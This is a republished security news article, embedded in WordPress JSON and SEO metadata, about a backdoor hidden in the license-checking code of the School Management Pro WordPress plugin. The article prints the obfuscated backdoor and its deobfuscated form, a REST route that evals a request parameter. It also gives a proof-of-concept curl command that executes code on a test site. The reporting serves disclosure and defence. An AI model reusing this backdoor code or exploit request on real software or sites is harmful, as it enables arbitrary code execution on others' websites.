{"id":46800,"date":"2022-05-23T13:57:59","date_gmt":"2022-05-23T13:57:59","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/33478\/Researchers-Find-Backdoor-Lurking-In-WP-Plugin-Used-By-Schools.html"},"modified":"2022-05-23T13:57:59","modified_gmt":"2022-05-23T13:57:59","slug":"researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/","title":{"rendered":"Researchers Find Backdoor Lurking In WP Plugin Used By Schools"},"content":{"rendered":"<figure class=\"intro-image intro-left\"> <img decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2021\/03\/backdoor-800x450.jpeg\" alt=\"A cartoon door leads to a wall of computer code.\"><figcaption class=\"caption\"><\/figcaption><\/figure>\n<aside id=\"social-left\" class=\"social-left\" aria-label=\"Read the comments or share this article\"> <a title=\"37 posters participating\" class=\"comment-count icon-comment-bubble-down\" href=\"https:\/\/arstechnica.com\/information-technology\/2022\/05\/researchers-find-backdoor-lurking-in-wordpress-plugin-used-by-schools\/?comments=1\"> <\/p>\n<h4 class=\"comment-count-before\">reader comments<\/h4>\n<p> <span class=\"comment-count-number\">67<\/span> <span class=\"visually-hidden\"> with 37 posters participating<\/span> <\/a> <\/p>\n<div class=\"share-links\">\n<h4>Share this story<\/h4>\n<\/p><\/div>\n<\/aside>\n<p> <!-- cache hit 22:single\/related:47e97f62d3d969729fb2cd27712e1779 --><!-- empty --><\/p>\n<p>Researchers said on Friday that they found a malicious backdoor in a WordPress plugin that gave attackers full control of websites that used the package, which is marketed to schools.<\/p>\n<p>The premium version of <a href=\"https:\/\/weblizar.com\/plugins\/school-management\/\">School Management<\/a>, a plugin schools use to operate and manage their websites, has contained the backdoor since at least version 8.9, researchers at website security service Jetpack said in a <a href=\"https:\/\/jetpack.com\/blog\/backdoor-found-in-the-school-management-pro-plugin-for-wordpress\/#more-165795\">blog post<\/a> without ruling out that it had been present in earlier versions. <a href=\"https:\/\/codecanyon.net\/item\/school-management-education-learning-management-system-for-wordpress\/24678776\">This page<\/a> from a third-party site shows that version 8.9 was released last August.<\/p>\n<h2>Obvious backdoor<\/h2>\n<p>Jetpack said it discovered the backdoor after support team members at WordPress.com reported finding heavily obfuscated code on several sites that used School Management Pro. After deobfuscating it, they realized that the code, stashed in the license-checking part of the plugin, was intentionally placed there with the goal of giving outsiders the ability to take control of sites.<\/p>\n<p>\u201cThe code itself isn\u2019t all that interesting: it\u2019s an obvious backdoor injected into the license-checking code of the plugin,\u201d the Jetpack post said. \u201cIt allows any attacker to execute arbitrary PHP code on the site with the plugin installed.\u201d<\/p>\n<aside class=\"ad_wrapper\" aria-label=\"In Content advertisement\"> <span class=\"ad_notice\">Advertisement <\/span> <\/aside>\n<p>In its obfuscated form, the code looked like this:<\/p>\n<pre class=\"brush: php; first-line: 682; title: ; notranslate\" title>}\n$_fc = eval(\"\\x65\\x76\\x61\\x6c(\\x67\\x7a\".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . \"\\x6c\\x61\\x74\" . \"\\x65\\x28\\x62\".\"\\x61\\x73\\x65\\x36\".\"\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu\/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ\/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i\/\/I303OsGfjoLO2Pzm13JjuMfw6SQS\/m304Bs='\" . str_repeat(chr(0x29), 3).\"\\x3b\");\nclass WLSM_Crypt_Blowfish_DefaultKey\n<\/pre>\n<p>After deobfuscation, the code was:<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \">\n<pre class=\"brush: php; title: ; notranslate\" title>add_action( 'rest_api_init', function() { register_rest_route( 'am-member', 'license', array( 'methods' =&gt; WP_REST_Server::CREATABLE, 'callback' =&gt; function( $request ) { $args = $request-&gt;get_params(); if ( isset( $args['blowfish'] ) &amp;&amp; ! empty( $args['blowfish'] ) &amp;&amp; isset( $args['blowf'] ) &amp;&amp; ! empty( $args['blowf'] ) ) { eval( $args['blowf'] ); } }, ) );\n} );\n<\/pre>\n<\/div>\n<p>Researchers wrote a proof-of-concept exploit that confirmed the obfuscated code was indeed a backdoor that allowed anyone with knowledge of it to execute code of their choice on any site running the plugin.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \">\n<pre class=\"brush: plain; title: ; notranslate\" title>$ curl -s -d 'blowfish=1' -d \"blowf=system('id');\" 'http:\/\/localhost:8888\/wp-json\/am-member\/license'\nuid=33(www-data) gid=33(www-data) groups=33(www-data) Warning: Cannot modify header information - headers already sent by (output started at \/var\/www\/html\/wp-content\/plugins\/school-management-pro-9.9.4\/admin\/inc\/manager\/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in \/var\/www\/html\/wp-includes\/rest-api\/class-wp-rest-server.php on line 1713\n<\/pre>\n<\/div>\n<h2>The mystery remains<\/h2>\n<p>It\u2019s not clear how many sites use the plugin. <a href=\"https:\/\/weblizar.com\/members\/signup\/school-management\">Weblizar<\/a>, the India-based maker of School Management, says on its homepage that it has \u201c340k+\u201d customers for its free and premium themes and plugins, but the backdoor Jetpack found was only in School Management Pro. The backdoor wasn\u2019t in the free version of the plugin, and there\u2019s no indication it was put into other plugins Weblizar publishes.<\/p>\n<p>\u201cWe have tried to get more information from the vendor about when the backdoor was injected, what versions are affected, and how the code ended up in the plugin in the first place,\u201d the post said. \u201cThis effort has been unsuccessful, as the vendor says they do not know when or how the code came into their software.\u201d<\/p>\n<p>Attempts to reach Weblizar weren\u2019t successful.<\/p>\n<p>Now that the presence of the backdoor is public knowledge, attackers are likely to exploit it on any website using a vulnerable version of the plugin. Anyone who uses this plugin should update immediately. Even after patching, they should also carefully scan their site for signs of compromise, since the update won\u2019t remove any new backdoors that may have been added.<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/33478\/Researchers-Find-Backdoor-Lurking-In-WP-Plugin-Used-By-Schools.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":46801,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[60],"tags":[10020],"class_list":["post-46800","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-packet-storm","tag-headlineprivacywordpressbackdoor"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Researchers Find Backdoor Lurking In WP Plugin Used By Schools 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Researchers Find Backdoor Lurking In WP Plugin Used By Schools 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-05-23T13:57:59+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2021\/03\/backdoor-800x450.jpeg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Researchers Find Backdoor Lurking In WP Plugin Used By Schools\",\"datePublished\":\"2022-05-23T13:57:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/\"},\"wordCount\":459,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools.jpg\",\"keywords\":[\"headline,privacy,wordpress,backdoor\"],\"articleSection\":[\"Packet Storm\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/\",\"name\":\"Researchers Find Backdoor Lurking In WP Plugin Used By Schools 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools.jpg\",\"datePublished\":\"2022-05-23T13:57:59+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools.jpg\",\"width\":800,\"height\":450},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,privacy,wordpress,backdoor\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlineprivacywordpressbackdoor\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Researchers Find Backdoor Lurking In WP Plugin Used By Schools\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Researchers Find Backdoor Lurking In WP Plugin Used By Schools 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/","og_locale":"en_US","og_type":"article","og_title":"Researchers Find Backdoor Lurking In WP Plugin Used By Schools 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-05-23T13:57:59+00:00","og_image":[{"url":"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2021\/03\/backdoor-800x450.jpeg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Researchers Find Backdoor Lurking In WP Plugin Used By Schools","datePublished":"2022-05-23T13:57:59+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/"},"wordCount":459,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools.jpg","keywords":["headline,privacy,wordpress,backdoor"],"articleSection":["Packet Storm"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/","url":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/","name":"Researchers Find Backdoor Lurking In WP Plugin Used By Schools 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools.jpg","datePublished":"2022-05-23T13:57:59+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools.jpg","width":800,"height":450},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/researchers-find-backdoor-lurking-in-wp-plugin-used-by-schools\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,privacy,wordpress,backdoor","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlineprivacywordpressbackdoor\/"},{"@type":"ListItem","position":3,"name":"Researchers Find Backdoor Lurking In WP Plugin Used By Schools"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46800","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=46800"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46800\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/46801"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=46800"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=46800"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=46800"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}